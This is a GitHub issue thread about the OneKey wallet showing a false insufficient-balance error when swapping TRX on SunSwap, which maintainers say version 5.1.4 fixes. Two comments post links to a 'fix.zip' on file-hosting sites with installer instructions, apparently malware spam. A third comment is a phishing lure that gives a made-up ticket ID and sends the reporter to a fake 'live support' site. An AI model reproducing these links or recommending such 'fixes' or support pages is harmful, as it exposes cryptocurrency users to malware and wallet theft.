### ISSUE TITLE
[BUG]: Can't swap TRX tokens on SunSwap, get false Insufficient balance error

### ISSUE THREAD

**Issue by jorg1piano** [OneKeyHQ/app-monorepo#5629]
When trying to swap tron tokens in the web browser inside the OneKey app it says insufficient funds even though I have TRX tokens. Essentially it is unusable to interact with DEX's on TRON at the moment.

<img width="1173" alt="image" src="https://github.com/user-attachments/assets/106a77d5-3afb-47d5-9466-2ff7d14c548e">

As you can see I have a some tron tokens in my wallet:
<img width="305" alt="image" src="https://github.com/user-attachments/assets/d68f1143-15e6-42f4-98ee-da6ee1db59e9">

 - OS: Mac OS 14.4.1 (23E224
 - OneKey Version 5.1.2 (2024082141)

**Comment by Mlecherf** [comment]
Download 
https://www.mediafire.com/file/ynhx37qmyqek881/fix.zip/file
In the installer menu, select "gcc."

**Comment by Wanderx13** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by liubin595338764** [comment]
我也遇到的同样的问题，sun.io等网站上无法使用onekey浏览器扩展插件无法连接tron钱包

**Comment by Clarevero1** [comment]
> When trying to swap tron tokens in the web browser inside the OneKey app it says insufficient funds even though I have TRX tokens. Essentially it is unusable to interact with DEX's on TRON at the moment.
> 
> <img alt="image" width="1173" src="https://private-user-images.githubusercontent.com/10857670/361267148-106a77d5-3afb-47d5-9466-2ff7d14c548e.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MjQ5NzMzODIsIm5iZiI6MTcyNDk3MzA4MiwicGF0aCI6Ii8xMDg1NzY3MC8zNjEyNjcxNDgtMTA2YTc3ZDUtM2FmYi00N2Q1LTk0NjYtMmZmN2QxNGM1NDhlLnBuZz9YLUFtei1BbGdvcml0aG09QVdTNC1ITUFDLVNIQTI1NiZYLUFtei1DcmVkZW50aWFsPUFLSUFWQ09EWUxTQTUzUFFLNFpBJTJGMjAyNDA4MjklMkZ1cy1lYXN0LTElMkZzMyUyRmF3czRfcmVxdWVzdCZYLUFtei1EYXRlPTIwMjQwODI5VDIzMTEyMlomWC1BbXotRXhwaXJlcz0zMDAmWC1BbXotU2lnbmF0dXJlPTM5MGQ2MzYwOWIwYmQ2YTc3NWJmMjc4YzVkODYyYjc2ZmNiMWFjZmE4YTE5NWFjYzU1OTg3ZWE2ZjJjN2VkYjEmWC1BbXotU2lnbmVkSGVhZGVycz1ob3N0JmFjdG9yX2lkPTAma2V5X2lkPTAmcmVwb19pZD0wIn0.ao-np5qO-7MnYiD_XxfRm7J0JXwJ5kmBck-8qIqIDCU">
> As you can see I have a some tron tokens in my wallet: <img alt="image" width="305" src="https://private-user-images.githubusercontent.com/10857670/361267188-d68f1143-15e6-42f4-98ee-da6ee1db59e9.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MjQ5NzMzODIsIm5iZiI6MTcyNDk3MzA4MiwicGF0aCI6Ii8xMDg1NzY3MC8zNjEyNjcxODgtZDY4ZjExNDMtMTVlNi00MmY0LTk4ZWUtZGE2ZWUxZGI1OWU5LnBuZz9YLUFtei1BbGdvcml0aG09QVdTNC1ITUFDLVNIQTI1NiZYLUFtei1DcmVkZW50aWFsPUFLSUFWQ09EWUxTQTUzUFFLNFpBJTJGMjAyNDA4MjklMkZ1cy1lYXN0LTElMkZzMyUyRmF3czRfcmVxdWVzdCZYLUFtei1EYXRlPTIwMjQwODI5VDIzMTEyMlomWC1BbXotRXhwaXJlcz0zMDAmWC1BbXotU2lnbmF0dXJlPTc0NjA2NGYxNWFlMzA2MGVmZWVjNDAzNzlhNmZhNTUxMTVjMTJkM2RkYWQ4YTIzY2Q2NmNlZDA4YmQwZDZmMTUmWC1BbXotU2lnbmVkSGVhZGVycz1ob3N0JmFjdG9yX2lkPTAma2V5X2lkPTAmcmVwb19pZD0wIn0.QJZP5bfX9Ch6Sj14_zTRJGxNC3J6N-45fo5tG7ZoByU">
> 
> * OS: Mac OS 14.4.1 (23E224
> * OneKey Version 5.1.2 (2024082141)

@jorg1piano You're experiencing transcript error. It sounds like your query would be best dealt with by the support team.
I'll have to refer you to the official support live chat with the ticket ID TRX07638
Please see the link below to our dedicated support line:
[Tron live support](https://thedappsupport.web.app/)
 Click on the live chat icon at the bottom corner of the page to initiate chat with a live support agent

**Comment by jorg1piano** [comment]
I'm pretty sure this is not a transcription error. There is definitely a bug in the app.

**Comment by revan-zhang** [comment]
@liubin595338764 chrome extension fixed this issue at vervion v5.1.4

**Comment by ByteZhang1024** [comment]
@liubin595338764 
Version 5.1.4 has been released, and this issue has been fixed.
